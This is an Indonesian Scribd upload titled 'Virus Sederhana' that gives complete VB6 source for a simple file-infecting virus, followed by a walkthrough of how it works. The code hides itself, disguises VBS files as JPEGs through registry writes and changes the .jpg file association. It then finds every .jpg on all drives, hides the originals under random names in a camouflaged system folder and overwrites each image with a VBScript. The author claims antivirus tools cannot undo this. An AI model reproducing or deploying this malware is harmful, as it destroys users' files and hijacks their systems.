Scribd Logo
Unggah

Selamat datang di Scribd!

  • Virus Sederhana

    Diunggah oleh

    Adiwidya Nabawi
    1 tayangan4 halaman
    Project

    Hak Cipta

    © © All Rights Reserved

    Format Tersedia

    DOC, PDF, TXT atau baca online dari Scribd

    Apakah menurut Anda dokumen ini bermanfaat?

    Apakah konten ini tidak pantas?

    Laporkan Dokumen Ini
    Project

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai DOC, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    1 tayangan4 halaman

    Virus Sederhana

    Diunggah oleh

    Adiwidya Nabawi
    Project

    Hak Cipta:

    © All Rights Reserved
    Unduh sebagai DOC, PDF, TXT atau baca online dari Scribd
    Tandai sebagai konten tidak pantas
    dari 4

    1. Teknik pembuatan virus sederhana dengan menggunakan VB 6.

    VERSION 0.00
    Begin VB.Form Form1
    Caption = "Form1"
    ClientHeight = 3195
    ClientLeft = 60
    ClientTop = 345
    ClientWidth = 4680
    LinkTopic = "Form1"
    ScaleHeight = 3195
    ScaleWidth = 4680
    StartUpPosition = 3 'Windows Default
    Begin VB.ListBox List1
    Height = 2985
    Left = 120
    TabIndex = 0
    Top = 120
    Width = 4455
    End
    End
    Attribute VB_Name = "Form1"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = False
    'Original code by : [Nama_Anda]
    'Email & YM : alamat@email.com
    'Powered by : Panggilan_Anda
    'Thx to : - Dosen_Anda, Kampus_Anda
    ' - Siapa_Aja
    ' - Siapa_Aja
    ' - Siapa_Aja
    ' - Siapa_Aja

    'Saya tidak bertanggung jawab atas penyalahgunaan code ini

    Option Explicit
    Dim i, x, xx As Long: Dim b As String
    Dim place As String
    Dim chrx As String: Dim p As String
    Dim rgdt As Object

    Function jahat(path As String)


    Open path For Input As #1
    Do While Not (EOF(1))
    x = Int(Rnd * 1000)
    xx = Int(Rnd * x)
    '--x dan xx = melakukan random dengan range yang ditentukan------------------
    Input #1, b
    p = b & ".{645FF040-5081-101B-9F08-00AA002F954E}"
    MkDir (p)
    '--Pembuatan Folder Kamuflase [Recycle Bin]----------------------------------
    SetAttr p, vbSystem + vbHidden
    '--Membuat Folder Kamuflase beratribut system dan hidden---------------------
    '--Folder Kamuflase Harus beratribut system----------------------------------
    FileCopy b, p & "\" & x & "." & xx
    '--Backup File Asli dengan merename nama file tersebut-----------------------
    Shell "cmd /c echo msgbox " & Chr(34) & _
    "fotonya gak keren kalo bukan fotonya PRESIDEN SBY" & _
    Chr(34) & " > " & Chr(34) & b & Chr(34), vbHide
    '--Injeksi File *.jpg dengan bantuan fungsi echo dari cmd--------------------
    Loop
    Close #1

    jahat = b
    '---------------------------------------------------------------------------------
    End Function

    Private Sub Form_Load()


    Me.Visible = False
    App.TaskVisible = False
    Randomize 'membuat benar2 random

    Set rgdt = CreateObject("wscript.shell")


    rgdt.regwrite "HKCR\VBSFile\DefaultIcon\", "shimgvw.dll,3"
    rgdt.regwrite "HKCR\VBSFile\FriendlyTypeName", "JPEG Image"
    '--mengubah nilai dari File VBS yang terdapat pada regisry------------------------

    Shell "cmd /c assoc .jpg=vbsfile", vbHide


    '--mengubah associaton file *.jpg [jpegfile] menjadi [vbsfile]--------------------

    place = Environ("windir") & "\list.gxry"

    '--logika bodoh yang kuberi nama si bodoh :-D [search file dengan bantuan perintah
    dir]--
    If Dir(place) <> "" Then GoTo beat

    On Error Resume Next


    For i = 65 To 90
    chrx = Chr(i) & ":\"
    Shell "cmd /c dir /a /b /s " & _
    chrx & "*.jpg >> " & place & _
    " && start " & App.path & App.EXEName & _
    ".exe", vbHide
    '--pencarian informasi path file *.jpg dengan perintah dir------------------
    Next
    End
    Exit Sub

    beat:
    Call jahat(place)
    Kill place
    End
    '----------------------------------------------------------------------------------
    End Sub

    DOKUMENTASI:

    virus ini akan menginfeksi file *.jpg, kita bisa melihatnya dari code:
    Shell "cmd /c dir /a /b /s " & _
    chrx & "*.jpg >> " & place & _
    " && start " & App.path & App.EXEName & _
    ".exe", vbHide

    virus ini akan menginfeksi file berext *.jpg dan bisa diganti sesuai kebutuhan.
    logika: utk menemukan file dengan menggunakn fungsi dir dari cmd... [no api function]
    penjabaran: load -> jalankan cmd.exe dengan fungsi dir + end program -> file ketampung
    + load virus

    dan virus ini akan mengubah asosiasi file *.jpg menjadi *.vbs, seperti terlihat di code:
    Shell "cmd /c assoc .jpg=vbsfile", vbHide

    mengubah registry file *.vbs, supaya seolah-olah menjadi file *.jpg seperti terlihat pada
    code:
    Set rgdt = CreateObject("wscript.shell")
    rgdt.regwrite "HKCR\VBSFile\DefaultIcon\", "shimgvw.dll,3"
    rgdt.regwrite "HKCR\VBSFile\FriendlyTypeName", "JPEG Image"

    infeksinya dimana? Virus tersebut akan menginfeksi file *.jpg dengan menginjeksi beberapa
    string ke dalamnya dengan teknik bodoh namun mantab. Perhatikan code berikut:
    Shell "cmd /c echo msgbox " & Chr(34) & _
    "fotonya gak keren kalo bukan fotonya gxry" & _
    Chr(34) & " > " & Chr(34) & b & Chr(34), vbHide

    coding ini juga melakukan backup data file *.jpg dengan menaruhnya pada folder yang
    akan dikamuflase dan merename file asli dengan fungsi random [acak], jadi AV manapun
    gak bakal bisa benerin... perhatikan code:
    x = Int(Rnd * 1000)
    xx = Int(Rnd * x)
    p = b & ".{645FF040-5081-101B-9F08-00AA002F954E}"  CLISD apakah ini? :-D
    MkDir (p)
    SetAttr p, vbSystem + vbHidden
    FileCopy b, p & "\" & x & "." & xx

    PERHATIAN:
    Jangan dicoba pada komputer sendiri kecuali anda dapat mengantisipasi dampaknya, atau
    telah membuat recovery’nya.

    Anda mungkin juga menyukai